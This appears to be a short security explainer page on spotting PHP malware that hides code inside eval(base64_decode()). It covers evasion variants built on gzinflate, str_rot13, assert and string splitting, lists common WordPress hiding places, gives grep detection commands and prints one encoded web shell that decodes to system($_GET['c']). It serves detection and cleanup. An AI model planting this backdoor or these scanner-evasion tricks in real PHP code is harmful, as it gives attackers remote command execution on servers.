Obfuscation & Deobfuscation · 1 min read

PHP eval(base64_decode()) Malware Patterns

The `eval(base64_decode('...'))` pattern is the signature of PHP malware. It hides a webshell, backdoor, or spam injector inside an innocuous-looking Base64 string, then executes it with eval(). You'll find it injected into WordPress themes, uploaded as fake plugins, or appended to legitimate PHP files during a server compromise.

Try it now

Encoder / Decoder

Runs in your browser, nothing leaves your device.

The simplest form is `eval(base64_decode('encoded_payload'))`. More advanced variants chain encoding: `eval(gzinflate(base64_decode('...')))` adds gzip compression, `eval(str_rot13(base64_decode('...')))` adds character rotation. Some use `assert()` instead of `eval()` or call `create_function()` to avoid keyword-based scanning. Variable-based obfuscation like `$f='base'.'64_decode'; eval($f('...'))` bypasses simple grep searches.

Check recently modified PHP files, especially in wp-content/themes, wp-content/plugins, and wp-includes. Malware often hides in functions.php, wp-config.php, or index.php. Look for files with unusual modification timestamps, files much larger than expected, and PHP files in upload directories where only images should exist.

Simple PHP backdoor

Input
eval(base64_decode('c3lzdGVtKCRfR0VUWydjJ10pOw=='));
Result
system($_GET['c']); // Remote command execution

Chained encoding

Input
eval(gzinflate(base64_decode('...')));
Result
Decode base64 first, then decompress gzip to get the PHP code

Security context

If you find eval(base64_decode()) in a PHP file, assume the server is compromised. Decode the payload to understand what the attacker can do, then check access logs for exploitation evidence. The encoded content is usually a webshell that gives the attacker full server access.

Search for eval(base64_decode, eval(gzinflate, assert(base64_decode, and create_function in all PHP files. Use: grep -r 'eval(base64_decode' /var/www/html/. Also check for files modified recently that shouldn't have been, and PHP files in upload directories.

Not always, but it's a major red flag. Some template engines and legacy code use eval() legitimately, but modern PHP frameworks avoid it entirely. eval(base64_decode()) specifically is almost always malware, as there is no legitimate reason to execute encoded PHP at runtime.

Go deeper

Continue in the Web Security Academy

Related techniques

Comparing (/4):

Tool Comparison

Feature
Type
Pricing
Platforms
Description